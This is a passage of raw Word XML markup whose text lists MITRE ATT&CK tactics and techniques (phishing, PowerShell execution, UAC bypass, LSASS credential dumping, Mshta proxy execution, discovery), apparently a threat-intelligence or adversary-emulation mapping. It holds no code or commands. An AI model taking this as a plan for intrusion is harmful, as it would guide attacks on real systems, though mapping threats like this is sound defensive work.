          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF3348"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.002', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F52A2"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21E5E5"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605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D6240"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.007', 'T1059.006', 'T1204.001', 'T1053.005', 'T1203', 'T1059.005', 'T1559.002', 'T1059.003', 'T1559.001', 'T1047', 'T1204.002', 'T1059.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F05FF"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T1059.007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005CBD2"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T1059.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59691C5E"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30721D43"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D96863"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438657A9"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FF3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDC2FE"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T1559.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Dynamic Data Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E4086"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E1BA4"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EE77AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1559.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE77AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Component Object Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70871693"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A07DB"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605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C192D"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FF3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAEAB29"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1053.005', 'T1137.001', 'T1547.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE93F9B"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839CC97"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T1137.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Office Application Startup&gt;:Office Template Macros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A87EE"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AD37CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDB5D0"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1053.005', 'T1548.002', 'T1547.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3364CC3F"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC6501"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBA238"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B036D"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1562.001', 'T1027.003', 'T1027.004', 'T1218.011', 'T1548.002', 'T1036.005', 'T1218.003', 'T1027', 'T1140', 'T1218.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF5892"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363B7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1562.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0385A924"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T1027.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B68439"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T1027.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Compile After Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB56C0"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3BC7A3"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5266816B"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FD178"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E817DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1218.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E817DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:CMSTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93BC23" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="0049125D" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="0049125D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0049125D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0049125D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A578DC"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1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041A6A37"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C25C73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C25C73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C25C73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04696EBD"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1555', 'T1003.005', 'T1003.004', 'T1555.003', 'T1552.001', 'T1003.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA0952"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1555 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials from Password Stores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D4859F"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T1003.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:Cached Domain Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417281D"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T1003.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSA Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276AA40C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41242D16"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T1552.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Credentials In Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E27ED5"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328830D"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1518', 'T1049', 'T1087.002', 'T1033', 'T1016', 'T1518.001', 'T1082', 'T1057', 'T1083']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0438631E"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1518 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
